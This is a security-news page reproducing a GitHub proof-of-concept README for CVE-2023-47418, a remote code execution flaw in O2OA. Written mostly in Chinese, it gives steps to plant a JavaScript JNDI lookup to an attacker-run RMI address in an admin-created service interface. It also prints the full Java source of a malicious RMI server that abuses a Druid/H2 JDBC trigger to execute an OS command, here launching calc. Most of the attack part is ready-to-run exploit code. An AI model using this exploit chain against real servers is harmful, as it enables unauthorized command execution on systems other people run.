Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-47418: GitHub - Onlyning/O2OA

Remote Code Execution (RCE) vulnerability in o2oa version 8.1.2 and before, allows attackers to create a new interface in the service management function to execute JavaScript.

CVE
#sql#vulnerability#web#apache#git#java#rce#alibaba

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

1 branch 0 tags

Code

  • Use Git or checkout with SVN using the web URL.

  • Open with GitHub Desktop

  • Download ZIP

Latest commit

FilesPermalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

OA远程代码执行

1.管理员登录之后访问服务管理,然后新建一个接口

2.接口中 写一个调用jndi服务的脚本

var poc=new javax.naming.InitialContext().lookup("rmi://192.168.1.4:1099/zlgExploit");

3.开启JNDIRmi服务端(可以使用项目中的JNDIRmiServer.jar来启动rmi服务端:java -jar JNDIRmiServer.jar,启动之后在payload里面输入:rmi://yourip:1099/zlgExploit即可)

服务端代码如下

package com.best.hello.controller.JNDI;


import com.sun.jndi.rmi.registry.ReferenceWrapper;
import org.apache.naming.ResourceRef;

import javax.naming.InitialContext;
import javax.naming.Reference;
import javax.naming.StringRefAddr;
import java.rmi.Naming;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.RemoteObject;

// JNDI + RMI 服务
// rmi://127.0.0.1:1099/Object
public class JNDIRmiServer {
    public static void main(String[] args) throws Exception {
        Registry registry = LocateRegistry.createRegistry(1099);
        Reference ref = new Reference("javax.sql.DataSource","com.alibaba.druid.pool.DruidDataSourceFactory",null);
        String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
                "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
                "java.lang.Runtime.getRuntime().exec('cmd /c calc.exe')\n" +
                "$$\n";
        String JDBC_USER = "root";
        String JDBC_PASSWORD = "password";

        ref.add(new StringRefAddr("driverClassName","org.h2.Driver"));
        ref.add(new StringRefAddr("url",JDBC_URL));
        ref.add(new StringRefAddr("username",JDBC_USER));
        ref.add(new StringRefAddr("password",JDBC_PASSWORD));
        ref.add(new StringRefAddr("initialSize","1"));
        ref.add(new StringRefAddr("init","true"));
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);

        Naming.bind("rmi://0.0.0.0:1099/zlgExploit",referenceWrapper);

    }
}

在O2OA WEB端运行脚本之后,如下图所示,成功执行命令,计算机成功弹出

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907